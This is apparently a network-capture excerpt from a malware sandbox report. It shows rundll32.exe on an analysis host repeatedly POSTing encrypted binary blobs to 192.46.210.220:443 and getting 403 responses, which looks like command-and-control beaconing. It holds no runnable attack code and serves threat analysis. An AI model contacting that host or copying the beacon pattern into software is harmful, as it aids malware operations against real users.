Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:22 UTC | 54 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:22 UTC | 54 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:23 UTC | 59 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:23 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.4 | 49832 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:26 UTC | 59 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:26 UTC | 60 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:27 UTC | 69 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:27 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.4 | 49834 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:27 UTC | 64 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:27 UTC | 64 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:27 UTC | 69 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:27 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.4 | 49840 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:30 UTC | 69 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:30 UTC | 69 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:31 UTC | 79 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:31 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.4 | 49842 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:31 UTC | 74 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:31 UTC | 74 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:31 UTC | 79 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:31 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 49848 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:34 UTC | 79 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4865
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:07:34 UTC | 79 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:35 UTC | 89 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:07:35 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 49850 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:34 UTC | 84 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4853
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:07:34 UTC | 84 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:35 UTC | 89 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:07:35 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 49857 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:38 UTC | 89 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4865
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:07:38 UTC | 89 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:39 UTC | 99 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:07:38 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 49858 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:38 UTC | 94 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4853
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:07:38 UTC | 94 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:39 UTC | 99 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:07:39 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49793 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:06 UTC | 9 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4865
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:07:06 UTC | 10 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:07 UTC | 19 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:07:07 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 49865 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:42 UTC | 99 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4865
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:07:42 UTC | 99 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:42 UTC | 109 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:07:42 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 49866 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:42 UTC | 104 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4853
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:07:42 UTC | 104 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:43 UTC | 109 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:07:43 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 49873 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:45 UTC | 109 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4865
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:07:45 UTC | 109 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:46 UTC | 119 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:07:46 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 49874 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:46 UTC | 114 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4853
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:07:46 UTC | 114 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:46 UTC | 119 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:07:46 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 49883 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:49 UTC | 119 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4865
    Connection: Close
    Cache-Control: no-cache
